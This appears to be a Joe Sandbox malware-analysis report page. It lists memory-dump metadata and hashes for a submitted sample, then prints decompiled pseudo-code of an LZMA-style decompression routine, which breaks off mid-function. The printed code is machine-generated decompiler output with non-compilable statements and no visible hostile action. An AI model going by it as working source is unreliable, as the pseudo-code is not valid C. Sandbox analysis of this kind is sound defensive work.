                                                                                                                                                                                                                            0x0040735c
                                                                                                                                                                                                                            0x0040735f
                                                                                                                                                                                                                            0x00407361
                                                                                                                                                                                                                            0x00407361
                                                                                                                                                                                                                            0x00407361
                                                                                                                                                                                                                            0x00407364
                                                                                                                                                                                                                            0x00407367
                                                                                                                                                                                                                            0x0040736a
                                                                                                                                                                                                                            0x0040736d
                                                                                                                                                                                                                            0x00407370
                                                                                                                                                                                                                            0x00407373
                                                                                                                                                                                                                            0x00407374
                                                                                                                                                                                                                            0x00407376
                                                                                                                                                                                                                            0x00407376
                                                                                                                                                                                                                            0x00407376
                                                                                                                                                                                                                            0x00407379
                                                                                                                                                                                                                            0x0040737c
                                                                                                                                                                                                                            0x0040737f
                                                                                                                                                                                                                            0x00407382
                                                                                                                                                                                                                            0x00407385
                                                                                                                                                                                                                            0x00407389
                                                                                                                                                                                                                            0x0040738b
                                                                                                                                                                                                                            0x0040738e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407390
                                                                                                                                                                                                                            0x0040710d
                                                                                                                                                                                                                            0x0040710d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040710d
                                                                                                                                                                                                                            0x0040738e
                                                                                                                                                                                                                            0x004075c3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406bf2
                                                                                                                                                                                                                            0x004075fa
                                                                                                                                                                                                                            0x004075fa
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004075fa
                                                                                                                                                                                                                            0x00407447
                                                                                                                                                                                                                            0x004073ce
                                                                                                                                                                                                                            0x004073cb
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407002

                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                                                                                                                                                                                            • Instruction ID: 4a3513360c1d1cc4287bdabe5afcaa460628bed3c0d7ae87261646ca99be8a9f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0D711271D04228DBEF28CF98C9947ADBBF1FB44305F14806AD856B7280D738A986DF05
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0040711C Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 98%
                                                                                                                                                                                                                            			E0040711C() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
